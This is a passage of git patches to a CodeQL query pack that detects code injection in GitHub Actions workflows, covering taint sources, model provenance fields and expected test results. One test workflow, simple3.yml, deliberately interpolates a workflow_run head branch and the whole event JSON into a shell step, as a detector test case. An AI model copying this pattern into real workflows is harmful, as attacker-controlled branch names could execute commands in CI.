.github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | -| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | -| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | +| .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | +| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | +| .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | +| .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | +| .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | +| .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | +| .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | +| .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | nodes | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | @@ -198,14 +204,20 @@ nodes | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | +| .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | -| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | +| .github/workflows/test.yml:24:9:28:6 | Run Step: step2 [MSG2] | semmle.label | Run Step: step2 [MSG2] | | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | -| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | +| .github/workflows/test.yml:28:9:32:6 | Run Step: step3 [MSG3] | semmle.label | Run Step: step3 [MSG3] | +| .github/workflows/test.yml:30:20:30:48 | steps.step2.outputs.MSG2 | semmle.label | steps.step2.outputs.MSG2 | +| .github/workflows/test.yml:32:9:36:6 | Run Step: step4 [MSG4] | semmle.label | Run Step: step4 [MSG4] | +| .github/workflows/test.yml:34:20:34:48 | steps.step3.outputs.MSG3 | semmle.label | steps.step3.outputs.MSG3 | +| .github/workflows/test.yml:36:9:41:2 | Run Step: step5 [MSG5] | semmle.label | Run Step: step5 [MSG5] | +| .github/workflows/test.yml:38:20:38:48 | steps.step4.outputs.MSG4 | semmle.label | steps.step4.outputs.MSG4 | +| .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | semmle.label | github.event.workflow_run.display_title | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | semmle.label | github.event.workflow_run.head_commit.message | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | semmle.label | github.event.workflow_run.head_commit.author.email | @@ -297,7 +309,7 @@ subpaths | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | -| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | +| .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | From 5968da87bb807a187099fd103c2311e8ac66f9af Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Apr 2024 18:53:39 +0200 Subject: [PATCH 0156/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index f775d751164..c1d32a1f817 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.8 +version: 0.0.9 dependencies: codeql/controlflow: "*" codeql/dataflow: "*" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 2db4c237da3..134b0db2b17 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.8 +version: 0.0.9 groups: - actions - queries From 8d2b8be133ff0f088d70baab96cb0ba8ad5762aa Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 10 Apr 2024 22:32:49 +0200 Subject: [PATCH 0157/1267] Add github.event as a source --- .../codeql/actions/dataflow/FlowSources.qll | 8 +++++++ .../CWE-094/.github/workflows/simple3.yml | 23 +++++++++++++++++++ .../Security/CWE-094/CodeInjection.expected | 2 ++ .../CWE-094/PrivilegedCodeInjection.expected | 4 ++++ 4 files changed, 37 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index c0e0e759120..e07b9f76762 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -22,6 +22,13 @@ abstract class RemoteFlowSource extends SourceNode { override string getThreatModel() { result = "remote" } } +bindingset[context] +private predicate isExternalUserControlled(string context) { + exists(string reg | reg = "github\\.event" | + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + ) +} + bindingset[context] private predicate isExternalUserControlledIssue(string context) { exists(string reg | reg = ["github\\.event\\.issue\\.title", "github\\.event\\.issue\\.body"] | @@ -123,6 +130,7 @@ private predicate isExternalUserControlledWorkflowRun(string context) { private class EventSource extends RemoteFlowSource { EventSource() { exists(Expression e, string context | this.asExpr() = e and context = e.getExpression() | + isExternalUserControlled(context) or isExternalUserControlledIssue(context) or isExternalUserControlledPullRequest(context) or isExternalUserControlledReview(context) or diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml new file mode 100644 index 00000000000..be1559d4711 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml @@ -0,0 +1,23 @@ +on: + workflow_run: + workflows: + - 'prev' + types: + - completed + +permissions: + actions: read + checks: read + contents: read + +jobs: + echo_trigger: + name: Report changes + runs-on: ubuntu-latest + steps: + - name: Echo trigger + run: | + echo "head branch: ${{ github.event.workflow_run.head_branch }}" + cat << EOF + ${{ toJSON(github.event) }} + EOF diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 1a12b8e7277..a300f4dd11e 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -200,6 +200,8 @@ nodes | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | semmle.label | toJSON(github.event) | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index f4df15ae344..f025d13b1a9 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected @@ -200,6 +200,8 @@ nodes | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | semmle.label | toJSON(github.event) | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | @@ -307,6 +309,8 @@ subpaths | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | +| .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:23:31:23:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:25:11:25:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | From 0051914245f5f4e210e6bf06edff609d032ccb46 Mon Sep 17 00:00:00 2001 From: jorgectf Date: Thu, 11 Apr 2024 11:21:59 +0200 Subject: [PATCH 0158/1267] Add `.cache` to gitignore --- .gitignore | 1 + 1 file changed, 1 insertion(+) diff --git a/.gitignore b/.gitignore index 1127e8f55db..4ba9d315acc 100644 --- a/.gitignore +++ b/.gitignore @@ -4,3 +4,4 @@ ql/lib/.codeql/ ql/src/.codeql/ ql/test/.codeql/ db/ +.cache \ No newline at end of file From a817a22cc7ac10417f6c7cd8c137d0d7139bf87d Mon Sep 17 00:00:00 2001 From: jorgectf Date: Thu, 11 Apr 2024 11:22:36 +0200 Subject: [PATCH 0159/1267] Remove redundant import --- ql/lib/codeql/actions/dataflow/FlowSources.qll | 1 - ql/lib/codeql/actions/dataflow/FlowSteps.qll | 1 - 2 files changed, 2 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index c0e0e759120..8cbca48af0a 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -1,7 +1,6 @@ private import actions private import codeql.actions.DataFlow private import codeql.actions.dataflow.ExternalFlow -private import codeql.actions.Ast::Utils as Utils private import codeql.actions.security.ArtifactPoisoningQuery /** diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index e66c8e7c1b9..36965166d3b 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -6,7 +6,6 @@ private import actions private import codeql.util.Unit private import codeql.actions.DataFlow private import codeql.actions.dataflow.ExternalFlow -private import codeql.actions.Ast::Utils as Utils private import codeql.actions.security.ArtifactPoisoningQuery /** From c56f220b13d2dcf1c310035776369fc88d60a089 Mon Sep 17 00:00:00 2001 From: jorgectf Date: Thu, 11 Apr 2024 11:23:28 +0200 Subject: [PATCH 0160/1267] Add provenance field --- .../codeql/actions/dataflow/ExternalFlow.qll | 23 +++++++++++-------- .../internal/ExternalFlowExtensions.qll | 10 +++++--- ql/test/library-tests/test.ql | 10 ++++---- 3 files changed, 27 insertions(+), 16 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index c1c93221d1a..cc7e4c633e3 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -8,9 +8,10 @@ private import actions * - action: Fully-qualified action name (NWO) * - version: Either '*' or a specific SHA/Tag * - output arg: To node (prefixed with either `env.` or `output.`) + * - provenance: verification of the model */ -predicate sourceModel(string action, string version, string output, string kind) { - Extensions::sourceModel(action, version, output, kind) +predicate sourceModel(string action, string version, string output, string kind, string provenance) { + Extensions::sourceModel(action, version, output, kind, provenance) } /** @@ -21,9 +22,12 @@ predicate sourceModel(string action, string version, string output, string kind) * - input arg: From node (prefixed with either `env.` or `input.`) * - output arg: To node (prefixed with either `env.` or `output.`) * - kind: Either 'Taint' or 'Value' + * - provenance: verification of the model */ -predicate summaryModel(string action, string version, string input, string output, string kind) { - Extensions::summaryModel(action, version, input, output, kind) +predicate summaryModel( + string action, string version, string input, string output, string kind, string provenance +) { + Extensions::summaryModel(action, version, input, output, kind, provenance) } /** @@ -33,14 +37,15 @@ predicate summaryModel(string action, string version, string input, string outpu * - version: Either '*' or a specific SHA/Tag * - input: sink node (prefixed with either `env.` or `input.`) * - kind: sink kind + * - provenance: verification of the model */ -predicate sinkModel(string action, string version, string input, string kind) { - Extensions::sinkModel(action, version, input, kind) +predicate sinkModel(string action, string version, string input, string kind, string provenance) { + Extensions::sinkModel(action, version, input, kind, provenance) } predicate externallyDefinedSource(DataFlow::Node source, string sourceType, string fieldName) { exists(Uses uses, string action, string version, string kind | - sourceModel(action, version, fieldName, kind) and + sourceModel(action, version, fieldName, kind, _) and uses.getCallee() = action.toLowerCase() and ( if version.trim() = "*" @@ -63,7 +68,7 @@ predicate externallyDefinedStoreStep( DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c ) { exists(Uses uses, string action, string version, string input, string output | - summaryModel(action, version, input, output, "taint") and + summaryModel(action, version, input, output, "taint", _) and c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output.", "")) and uses.getCallee() = action.toLowerCase() and ( @@ -85,7 +90,7 @@ predicate externallyDefinedStoreStep( predicate externallyDefinedSink(DataFlow::Node sink, string kind) { exists(Uses uses, string action, string version, string input | - sinkModel(action, version, input, kind) and + sinkModel(action, version, input, kind, _) and uses.getCallee() = action.toLowerCase() and ( if input.trim().matches("env.%") diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll index 89cf4de0261..8e8ce10bba9 100644 --- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll +++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll @@ -5,16 +5,20 @@ /** * Holds if a source model exists for the given parameters. */ -extensible predicate sourceModel(string action, string version, string output, string kind); +extensible predicate sourceModel( + string action, string version, string output, string kind, string provenance +); /** * Holds if a summary model exists for the given parameters. */ extensible predicate summaryModel( - string action, string version, string input, string output, string kind + string action, string version, string input, string output, string kind, string provenance ); /** * Holds if a sink model exists for the given parameters. */ -extensible predicate sinkModel(string action, string version, string input, string kind); +extensible predicate sinkModel( + string action, string version, string input, string kind, string provenance +); diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index 4ee330a4466..afe382fa4d9 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -49,12 +49,14 @@ query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = query predicate scopes(Cfg::CfgScope c) { any() } -query predicate sources(string action, string version, string output, string kind) { - sourceModel(action, version, output, kind) +query predicate sources(string action, string version, string output, string kind, string provenance) { + sourceModel(action, version, output, kind, provenance) } -query predicate summaries(string action, string version, string input, string output, string kind) { - summaryModel(action, version, input, output, kind) +query predicate summaries( + string action, string version, string input, string output, string kind, string provenance +) { + summaryModel(action, version, input, output, kind, provenance) } query predicate calls(DataFlow::CallNode call, string callee) { callee = call.getCallee() } From c373238fa61c58ebb80ba0442b155173f40fa18a Mon Sep 17 00:00:00 2001 From: jorgectf Date: Thu, 11 Apr 2024 11:23:53 +0200 Subject: [PATCH 0161/1267] Add subfolders to `dataExtensions` --- ql/lib/qlpack.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 2b3896d0cf0..deb926bafff 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -14,3 +14,4 @@ groups: - yaml dataExtensions: - ext/*.model.yml + - ext/**/*.model.yml From 5a12a2213b091001439b04e356a199446a13da6b Mon Sep 17 00:00:00 2001 From: jorgectf Date: Thu, 11 Apr 2024 11:24:42 +0200 Subject: [PATCH 0162/1267] Add provenance to existing models --- ql/lib/ext/8398a7_action-slack.model.yml | 2 +- ql/lib/ext/TEST-RW-MODELS.model.yml | 8 ++-- ql/lib/ext/actions_github-script.model.yml | 2 +- ...ahmadnassri_action-changed-files.model.yml | 4 +- ql/lib/ext/akhileshns_heroku-deploy.model.yml | 24 ++++++------ ...nnn_action-semantic-pull-request.model.yml | 2 +- ql/lib/ext/anchore_sbom-action.model.yml | 10 ++--- ql/lib/ext/anchore_scan-action.model.yml | 2 +- .../ext/andresz1_size-limit-action.model.yml | 8 ++-- .../android-actions_setup-android.model.yml | 2 +- ...le-actions_import-codesign-certs.model.yml | 2 +- ql/lib/ext/asdf-vm_actions.model.yml | 2 +- ...taylor_read-json-property-action.model.yml | 2 +- ...ley-taylor_regex-property-action.model.yml | 4 +- .../aszc_change-string-case-action.model.yml | 6 +-- ...ctions_configure-aws-credentials.model.yml | 12 +++--- .../axel-op_googlejavaformat-action.model.yml | 4 +- ql/lib/ext/azure_powershell.model.yml | 2 +- ql/lib/ext/bahmutov_npm-install.model.yml | 2 +- .../blackducksoftware_github-action.model.yml | 6 +-- ql/lib/ext/bobheadxi_deployments.model.yml | 2 +- .../bufbuild_buf-breaking-action.model.yml | 6 +-- ql/lib/ext/bufbuild_buf-lint-action.model.yml | 4 +- .../ext/bufbuild_buf-setup-action.model.yml | 4 +- ql/lib/ext/cachix_cachix-action.model.yml | 6 +-- ql/lib/ext/changesets_action.model.yml | 4 +- .../ext/cloudflare_wrangler-action.model.yml | 4 +- ql/lib/ext/coursier_cache-action.model.yml | 2 +- .../crazy-max_ghaction-chocolatey.model.yml | 2 +- .../crazy-max_ghaction-import-gpg.model.yml | 2 +- .../csexton_release-asset-action.model.yml | 2 +- ...cycjimmy_semantic-release-action.model.yml | 6 +-- ql/lib/ext/cypress-io_github-action.model.yml | 2 +- .../ext/dailydotdev_action-devcard.model.yml | 4 +- ...me_reportgenerator-github-action.model.yml | 2 +- .../daspn_private-actions-checkout.model.yml | 4 +- .../dawidd6_action-ansible-playbook.model.yml | 4 +- ...dawidd6_action-download-artifact.model.yml | 2 +- ql/lib/ext/delaguardo_setup-clojure.model.yml | 2 +- ...tesystems_magic-nix-cache-action.model.yml | 12 +++--- ...er-practice_actions-setup-docker.model.yml | 6 +-- ql/lib/ext/docker_build-push-action.model.yml | 2 +- ql/lib/ext/dorny_paths-filter.model.yml | 2 +- ql/lib/ext/endbug_latest-tag.model.yml | 8 ++-- ql/lib/ext/expo_expo-github-action.model.yml | 4 +- ...seextended_action-hosting-deploy.model.yml | 2 +- .../frabert_replace-string-action.model.yml | 4 +- ...nzdiebold_github-env-vars-action.model.yml | 4 +- ql/lib/ext/gabrielbb_xvfb-action.model.yml | 4 +- ql/lib/ext/game-ci_unity-builder.model.yml | 4 +- .../ext/game-ci_unity-test-runner.model.yml | 2 +- ...autamkrishnar_blog-post-workflow.model.yml | 2 +- ql/lib/ext/getsentry_action-release.model.yml | 4 +- ql/lib/ext/github_codeql-action.model.yml | 2 +- .../ext/go-semantic-release_action.model.yml | 2 +- .../golangci_golangci-lint-action.model.yml | 2 +- .../ext/gonuit_heroku-docker-deploy.model.yml | 4 +- .../goreleaser_goreleaser-action.model.yml | 2 +- ...te-or-update-pull-request-action.model.yml | 8 ++-- .../ext/gradle_gradle-build-action.model.yml | 6 +-- ql/lib/ext/haya14busa_action-cond.model.yml | 4 +- ql/lib/ext/hexlet_project-action.model.yml | 2 +- ql/lib/ext/ilammy_msvc-dev-cmd.model.yml | 8 ++-- ql/lib/ext/ilammy_setup-nasm.model.yml | 4 +- ql/lib/ext/imjohnbo_issue-bot.model.yml | 6 +-- ql/lib/ext/iterative_setup-cml.model.yml | 2 +- ql/lib/ext/iterative_setup-dvc.model.yml | 2 +- ...sives_github-pages-deploy-action.model.yml | 12 +++--- .../ext/jitterbit_get-changed-files.model.yml | 14 +++---- .../ext/johnnymorganz_stylua-action.model.yml | 2 +- ql/lib/ext/jsdaniell_create-json.model.yml | 6 +-- .../ext/jurplel_install-qt-action.model.yml | 12 +++--- ql/lib/ext/jwalton_gh-ecr-push.model.yml | 8 ++-- ...han_pull-request-comment-trigger.model.yml | 4 +- ...leci-artifacts-redirector-action.model.yml | 2 +- ql/lib/ext/leafo_gh-actions-lua.model.yml | 4 +- .../ext/leafo_gh-actions-luarocks.model.yml | 2 +- .../lucasbento_auto-close-issues.model.yml | 2 +- ..._actions-find-and-replace-string.model.yml | 4 +- ql/lib/ext/magefile_mage-action.model.yml | 2 +- ql/lib/ext/maierj_fastlane-action.model.yml | 6 +-- .../manusa_actions-setup-minikube.model.yml | 8 ++-- ql/lib/ext/marocchino_on_artifact.model.yml | 2 +- ql/lib/ext/mattdavis0351_actions.model.yml | 14 +++---- .../ext/meteorengineer_setup-meteor.model.yml | 2 +- ...tro-digital_setup-tools-for-waas.model.yml | 2 +- ql/lib/ext/microsoft_setup-msbuild.model.yml | 4 +- ...mishakav_pytest-coverage-comment.model.yml | 2 +- ...hers-excellent_docker-build-push.model.yml | 22 +++++------ ql/lib/ext/msys2_setup-msys2.model.yml | 4 +- ql/lib/ext/mxschmitt_action-tmate.model.yml | 4 +- ql/lib/ext/mymindstorm_setup-emsdk.model.yml | 6 +-- .../ext/nanasess_setup-chromedriver.model.yml | 2 +- ql/lib/ext/nanasess_setup-php.model.yml | 2 +- ql/lib/ext/nick-fields_retry.model.yml | 6 +-- ql/lib/ext/octokit_graphql-action.model.yml | 2 +- ql/lib/ext/octokit_request-action.model.yml | 2 +- ql/lib/ext/olafurpg_setup-scala.model.yml | 2 +- .../paambaati_codeclimate-action.model.yml | 2 +- .../peter-evans_create-pull-request.model.yml | 2 +- .../ext/plasmicapp_plasmic-action.model.yml | 6 +-- .../preactjs_compressed-size-action.model.yml | 4 +- 